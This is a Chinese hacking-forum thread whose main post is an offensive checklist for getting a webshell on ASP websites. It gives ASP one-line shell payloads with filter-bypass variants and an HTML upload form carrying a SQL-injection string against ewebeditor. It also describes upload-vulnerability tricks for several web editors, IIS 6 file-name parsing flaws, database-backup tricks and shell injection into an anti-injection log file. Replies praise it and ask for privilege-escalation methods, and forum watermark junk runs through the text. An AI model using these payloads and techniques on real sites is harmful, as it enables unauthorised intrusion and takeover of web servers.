返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2 Q7 S3 t3 d) W* M9 x! K  f# ]8 R! |# a
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp3 |# j6 t0 C! e* B" v$ M9 y
' O7 I. c+ S; W/ j3 [
3.上传漏洞:* a3 w% _6 \. f

+ {: M* g& _  ]) X动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
+ z6 X+ q+ w! V# M6 F0 Y# r1 e, p$ g& i. ~
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
" S$ O$ |% e0 s, O/ ]0 t3 D$ T3 [. {) d0 }: j7 v7 T0 c
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
( u% M" o' Y& ^! R然后在上传文件里面填要传的图片格式的ASP木马  N4 C) V; I) U+ p  G  p
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp) r6 u" `0 `$ Q
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传( a( N) p2 p6 T2 k$ P  [

7 U, w% O8 H+ X; u: z$ q<html>/ L# q( C, g, e! E4 Y. k) ?$ ]& ^4 A$ {
<head>
" s. w$ f- f4 d5 u1 N<title>ewebeditor upload.asp上传利用</title>1 ^. j" I9 z7 x4 F* L- K/ K% R4 _
</head>
0 k; b. F% u6 Q( K5 C4 r8 k<body>2 z; i) V6 }. v; `
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
9 c$ S+ ?% }& S, T' J+ _* j<input type=file name=uploadfile size=100><br><br>
2 ~9 B! F( L/ S$ ?# A. |+ P<input type=submit value=Fuck>3 C4 o1 R- Y5 T4 e- a/ E* n
</form>' _; |( R  F- R2 k7 n0 p1 C
</body># [9 R1 B, M7 I6 e. ^. D6 E4 K
</form>, I5 I- v& x9 P" _- |
</html>( i3 y2 d; ^0 H7 R9 Q

, Q* f) }; q/ P6 z3 Y2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问1 @  I* A( C" r7 b$ h- P! q" ~3 l2 N
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp3 `9 Y$ {# c- Q3 ~

  W  k( N$ l& s利用windows2003解析。建立zjq.asp的文件夹
0 A- p7 z3 Y  C7 }% g
; Q3 F/ T  N+ j$ B6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
2 s& W: \. X2 [; C- C; D  S
7 A! |. c& E- D  A6 w: r& o7.cuteeditor:类似ewebeditor( b+ Y( Q* Y. J

& d7 B' F5 T9 F/ P  [8.htmleditor:同上
5 g# [. e* `# S/ M
* Z4 O+ W- L1 Y  w9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破4 |. ^' T" [/ z- j) V
( r5 [; K: ]9 v5 D. {) C; d
<%execute request("value")%><%'<% loop <%:%>4 f/ P- X0 W3 h$ |: Y+ o$ {$ O: ?' X
0 ]9 ]9 g' y6 N2 T/ n  f
<%'<% loop <%:%><%execute request("value")%>4 \% E+ z* s3 a( O7 W

8 D( _1 A/ K* n. _% y$ c2 q6 r  a<%execute request("value")'<% loop <%:%># |* I3 L" x; Z8 ?9 W$ l( i& Z
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞* s0 s$ ~; P4 x2 W0 f

! r) p- y; }% |( k4 G6 k+ g  n0 _/ b10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞9 ~* k& \$ E! p: |
) P3 R) Z) u( G( r1 h- v
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
4 i0 o& y/ s% i5 v1 p2 @4 L% w/ P9 t  v$ g
解析漏洞得到webshell+ Z- f" m( f3 w9 N

$ {+ w- L# g. s/ D& F2 u+ o' M12.mssql差异备份,日志备份,前提需知道web路径
- W+ N/ r  b  S- g% [4 {/ X' S# n! G7 m, J- [% G# o
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
0 L% s9 s2 u+ b8 L9 x5 C8 S! f0 ?% a6 h: Z& D
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
+ S2 s' s  x3 t# _5 [
3 A* ^; R1 q* F# M& g- `15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
: X9 k5 T( |$ i( M. O/ s6 t! Q) Q: I; ^7 @1 Q0 Q- c  G+ I( J
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
  ^: F6 f# s* u$ P不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
* M  [; c' N# t& L5 u5 U; Y" ~8 Z% X# I3 ~

4 V, S2 O4 @/ I) [* K+ k; p& H3 r很好啊、基本的入侵方法都包含了+ i% T" k+ q; z. o( V* J

+ e% x% M8 M4 J' \% a# H1 N5 S5 W最好来个提权的帖子再。
* `* d8 W3 L& w# s5 q9 A4 x* z5 ?. [& W' c
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表